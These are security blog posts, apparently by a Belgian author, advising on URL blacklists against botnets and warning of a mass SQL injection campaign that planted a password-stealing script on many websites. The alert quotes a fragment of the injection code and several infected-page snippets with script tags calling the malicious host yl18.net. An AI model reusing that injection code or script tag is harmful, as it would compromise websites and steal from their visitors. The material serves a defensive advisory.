I received a listing of sites that are involved in a botnet-rootkit-zeroday attack on the network of a reader of this blog. If you have logs like this send them to the central international coordination center at http://isc.sans.org they even have a tool that sends them automatically
but I thought I will take the logfile and construct a block-blacklist out of them and learn you guys maybe something about how to set up such a list if you are confronted with such an event (as antivirus and antimalware tools are sometimes helpless for days or weeks before being able to defend you against the new tricks online).
It is clear from the attack that it is based on scripts and lists that are online and that are being placed on websites that maybe don't know that they are a vehicle for such a zombie attack against others (even if it could lead to financial damages under European law - tell this to your boss if you wants to diminish your security budget).
So we have to limit the outgoing http traffic of your computers on your network to those sites or domains. Just to be sure that if a site gets infected he can't get his contacts or updates from the network infrastracture of the botnet.
The first thing to do is to select the domainnames that come from dangereous cybercountries with which you have no relation or business contacts. Here you should change from blacklisting domains to whitelistings sites (everything is blocked except these sites). Put a phonenumber on your intranet where people can ask to whitelist a site for 'business reasons'.
The second thing to block if you are in a business network are the freehosters that clearly have no security service or don't care a bit and that are distributing malware and are zombie infected. Most of the free hosters seen in this attack are already in other blacklists for this.
The third thing is the list of the rest of the sites. In a good proxy you should be able to have a blacklist as long as you which without any effect on your speed. You can use also other services but you should test them first and count the false negatives.
Some years ago the specialists laughed with urlfiltering and said it was useful, now it has become a necessary component of a fast response against new and fast moving attacks. It also have a good impact on your defenses because they just need to drop it, not analyse it. So if you have a ddos and you know where it comes from and it is repeatingly from the same sources, this will help (remember 11/11)
If your users have nothing to do in the following countries
just block them
these domains are really high risk and should be blacklisted
and individual destinations should be whitelisted
*.us not much used by USA states
*.tm not a country domain, but spammy
These are other domains for consideration of blocking
It is much more difficult to block .nl, .org, .it, .de
and so on
Free webspace hosters
blocking those can block some normal sites
the question is if users may go to personal sites
Some proxies and blocking tools want that you put a . or *. before the domainname.
You use this at your own risk. I am not resonsable if you use it without testing. It doesn't necessary mean that any contact to these domains shows an infection. It just gives you less work so you don't have to change the link, the domain or the way it is written or the IP address. Do not use this for other protocols like smtp.
Your input is always welcome
BOTNETS _ TURKISH HACKERS _ DDOS _ PHISHING _ VIRUS INSERTS_STORM WORM
and we should do as if everything is normal and there is nothing to worry about and there is nothing that should be done ......
According to the Internet Storm center (the thing that our politicians don't want to set up in Belgian even if they agreed to put into the Telecom law - it is much more important to squabble about BHV while your critical communication infrastructure is being attacked inside out without having the capabilities to respond effectively) there is an important and dangereous infection and password stealing script being placed on more than 40.000 websites already. They are busy trying to mobilise everybody to clean it up, but I think you should do also your own part and protect your network and your server.
First you should block at your firewall and all other filters every connection to 18.net/0.js Do not hesitate to do this. It is absolutely necessary.
Secondly if you have a website, the attacks will for the moment use an SQL injection and this is the attack code
declare @m varchar(8000);
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
and this on as many pages of the website as it can find
The internet storm center calls on all ISP's to take out and clean up websites that are hijacked - injected with this code. In Belgium a simple Google trick already showed some Belgian sites being infected. DO NOT VISIT THEM.
Futurestep - a Korn/Ferry Comp<script src="http://yl18.net/0.js ...- [ Traduire cette page ] www.futurestep.be/ - 48k -
If you have a forum you should block all the script possibilities otherwise you will infect your users
|Research method presentation<script src="http://yl18.net/0.js"></script>, New Topic · Reply to |
www.psypress.com/student/forum/topic.asp?TOPIC_ID=69 - 14k
It is even being introduced as additional newspage on news sites as here and look at the name of the pageTechnology Group International<script src="http://yl18.net/0.js ...- [ Traduire cette page ]
The newest version of Enterprise 21 offers significant enhancements designed to improve
www.manubiz.com/channel/news.asp?news=H4ED8KE9 - 4k -
And it are domains from all over the world that are being attacked,
from tn (tunesia) to uk to org to com and so on
a google for the script shows 50.000 pages, this is already more than 10.000 new pages
since the Internet storm center launched its alert
I think this will be spreading even more and it seems that antiviruses aren't very effective for now
and if thought that professional sites had professional security, think again
|LEUVEN, Belgium, January 15 /PRNewswire/ -- "http://yl18.net/0.js">. Website:, http://www.organon.com ...|
They have been replaced this morning, but yesterday they were hacked and this shows for important hosters nowadays the importance of permanent monitoring.
I WILL REPEAT THIS OVER AND OVER AGAIN : IF YOU WERE ALREADY HACKED BEFORE YOU WILL BE ATTACKED OVER AND OVER AGAIN AND YOU WILL BE HACKED AGAIN IF YOU LET DOWN YOUR GUARD.
ING is moving in Belgium from mortar banks to webbanks and for this reason will put more than 800 people out of a job. They will take others, but these will have to work in a callcenter and will probably be less paid. So you don't have to go to India to lower workingstandards.
So if you do only webbanking or selfcashing at your supermarket, don't be surprised afterwards that those not-so-quite intelligent won't a find a job any more. And don't be surprised either if you find out afterwards that the webservice won't stay cheap or free or as safe as they say.... You already have less consumer rights on the online banking against those on paper.
read the 'player piano' by Kurt Vonnegut (google : "piano player" vonnegut )
Some people say to me that they have their site totally under control. And when I ask them how, they say that they watch any change to their homepage every minute. Well, that is a start, but it only takes into account part of the defacements.
An enormous part of the defacements is by ADDING pages to your website. That is also the reason why many websites don't see this. A google alert isn't enough because Google only comes around every so many weeks and you shouldn't wait that long. You should really activate the logs that tell you when somebody logs in and when somebody adds a page or changes something on any other page. Off course the homepage is the flag for the defacer, but it looks like many off them are already very proud to have added a page to your website and don't bother to change the homepage itself.